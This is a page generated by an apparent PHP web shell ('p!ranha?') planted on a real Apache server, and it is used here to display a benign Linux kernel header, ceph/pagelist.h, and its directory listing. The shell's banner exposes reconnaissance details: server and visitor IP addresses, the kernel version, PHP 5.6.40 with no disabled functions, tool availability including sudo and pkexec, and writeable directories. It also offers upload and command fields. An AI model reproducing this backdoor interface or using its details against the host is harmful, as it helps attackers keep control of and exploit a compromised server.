p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.216.202
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/modules/3.10.0-1160.105.1.el7.x86_64/source/include/linux/ceph/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/lib/modules/3.10.0-1160.105.1.el7.x86_64/source/include/linux/ceph/pagelist.h
#ifndef __FS_CEPH_PAGELIST_H
#define __FS_CEPH_PAGELIST_H

#include <asm/byteorder.h>
#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/types.h>

struct ceph_pagelist {
	struct list_head head;
	void *mapped_tail;
	size_t length;
	size_t room;
	struct list_head free_list;
	size_t num_pages_free;
	atomic_t refcnt;
};

struct ceph_pagelist_cursor {
	struct ceph_pagelist *pl;   /* pagelist, for error checking */
	struct list_head *page_lru; /* page in list */
	size_t room;		    /* room remaining to reset to */
};

static inline void ceph_pagelist_init(struct ceph_pagelist *pl)
{
	INIT_LIST_HEAD(&pl->head);
	pl->mapped_tail = NULL;
	pl->length = 0;
	pl->room = 0;
	INIT_LIST_HEAD(&pl->free_list);
	pl->num_pages_free = 0;
	atomic_set(&pl->refcnt, 1);
}

extern void ceph_pagelist_release(struct ceph_pagelist *pl);

extern int ceph_pagelist_append(struct ceph_pagelist *pl, const void *d, size_t l);

extern int ceph_pagelist_reserve(struct ceph_pagelist *pl, size_t space);

extern int ceph_pagelist_free_reserve(struct ceph_pagelist *pl);

extern void ceph_pagelist_set_cursor(struct ceph_pagelist *pl,
				     struct ceph_pagelist_cursor *c);

extern int ceph_pagelist_truncate(struct ceph_pagelist *pl,
				  struct ceph_pagelist_cursor *c);

static inline int ceph_pagelist_encode_64(struct ceph_pagelist *pl, u64 v)
{
	__le64 ev = cpu_to_le64(v);
	return ceph_pagelist_append(pl, &ev, sizeof(ev));
}
static inline int ceph_pagelist_encode_32(struct ceph_pagelist *pl, u32 v)
{
	__le32 ev = cpu_to_le32(v);
	return ceph_pagelist_append(pl, &ev, sizeof(ev));
}
static inline int ceph_pagelist_encode_16(struct ceph_pagelist *pl, u16 v)
{
	__le16 ev = cpu_to_le16(v);
	return ceph_pagelist_append(pl, &ev, sizeof(ev));
}
static inline int ceph_pagelist_encode_8(struct ceph_pagelist *pl, u8 v)
{
	return ceph_pagelist_append(pl, &v, 1);
}
static inline int ceph_pagelist_encode_string(struct ceph_pagelist *pl,
					      char *s, size_t len)
{
	int ret = ceph_pagelist_encode_32(pl, len);
	if (ret)
		return ret;
	if (len)
		return ceph_pagelist_append(pl, s, len);
	return 0;
}

#endif
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
January 19 2024 08:12:51
0 / 0
0755
auth.h
4.808 KB
November 06 2023 09:15:52
0 / 0
0644
buffer.h
0.767 KB
November 06 2023 09:15:52
0 / 0
0644
ceph_debug.h
0.848 KB
November 06 2023 09:15:52
0 / 0
0644
ceph_features.h
8.487 KB
November 06 2023 09:15:52
0 / 0
0644
ceph_frag.h
1.93 KB
November 06 2023 09:15:52
0 / 0
0644
ceph_fs.h
25.326 KB
November 06 2023 09:15:52
0 / 0
0644
ceph_hash.h
0.423 KB
November 06 2023 09:15:52
0 / 0
0644
cls_lock_client.h
1.556 KB
November 06 2023 09:15:52
0 / 0
0644
debugfs.h
0.713 KB
November 06 2023 09:15:52
0 / 0
0644
decode.h
9.018 KB
November 06 2023 09:15:52
0 / 0
0644
libceph.h
9.368 KB
November 06 2023 09:15:52
0 / 0
0644
mdsmap.h
1.579 KB
November 06 2023 09:15:52
0 / 0
0644
messenger.h
9.058 KB
November 06 2023 09:15:52
0 / 0
0644
mon_client.h
3.785 KB
November 06 2023 09:15:52
0 / 0
0644
msgpool.h
0.719 KB
November 06 2023 09:15:52
0 / 0
0644
msgr.h
5.608 KB
November 06 2023 09:15:52
0 / 0
0644
osd_client.h
14.354 KB
November 06 2023 09:15:52
0 / 0
0644
osdmap.h
8.243 KB
November 06 2023 09:15:52
0 / 0
0644
pagelist.h
2.062 KB
November 06 2023 09:15:52
0 / 0
0644
rados.h
16.904 KB
November 06 2023 09:15:52
0 / 0
0644
string_table.h
1.258 KB
November 06 2023 09:15:52
0 / 0
0644
types.h
0.496 KB
November 06 2023 09:15:52
0 / 0
0644